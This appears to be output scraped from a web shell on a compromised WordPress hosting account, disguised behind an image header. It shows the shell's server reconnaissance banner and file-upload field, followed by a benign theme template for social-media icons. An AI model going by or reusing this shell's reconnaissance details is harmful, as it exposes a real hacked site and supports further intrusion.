????JFIF??x?x????'
Server IP : 104.21.64.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tempvsty/eaabusiness.com/wp-content/plugins/themesky/templates/ |
Upload File : |
<?php $theme_options = yoome_get_theme_options(); $facebook_url = $theme_options['ts_facebook_url']; $twitter_url = $theme_options['ts_twitter_url']; $youtube_url = $theme_options['ts_youtube_url']; $instagram_url = $theme_options['ts_instagram_url']; $linkedin_url = $theme_options['ts_linkedin_url']; $custom_url = $theme_options['ts_custom_social_url']; $custom_class = $theme_options['ts_custom_social_class']; ?> <div class="ts-header-social-icons"> <span><?php esc_html_e('Follow:', 'themesky'); ?></span> <ul> <?php if( $facebook_url != '' ): ?> <li class="facebook"> <a href="<?php echo esc_url($facebook_url); ?>" target="_blank"><i class="fa fa-facebook"></i></a> </li> <?php endif; ?> <?php if( $twitter_url != '' ): ?> <li class="twitter"> <a href="<?php echo esc_url($twitter_url); ?>" target="_blank"><i class="fa fa-twitter"></i></a> </li> <?php endif; ?> <?php if( $youtube_url != '' ): ?> <li class="youtube"> <a href="<?php echo esc_url($youtube_url); ?>" target="_blank"><i class="fa fa-youtube-play"></i></a> </li> <?php endif; ?> <?php if( $instagram_url != '' ): ?> <li class="instagram"> <a href="<?php echo esc_url($instagram_url); ?>" target="_blank"><i class="fa fa-instagram"></i></a> </li> <?php endif; ?> <?php if( $linkedin_url != '' ): ?> <li class="linkedin"> <a href="<?php echo esc_url($linkedin_url); ?>" target="_blank"><i class="fa fa-linkedin"></i></a> </li> <?php endif; ?> <?php if( $custom_url != '' ): ?> <li class="custom"> <a href="<?php echo esc_url($custom_url); ?>" target="_blank"><i class="fa <?php echo esc_attr($custom_class) ?>"></i></a> </li> <?php endif; ?> </ul> </div>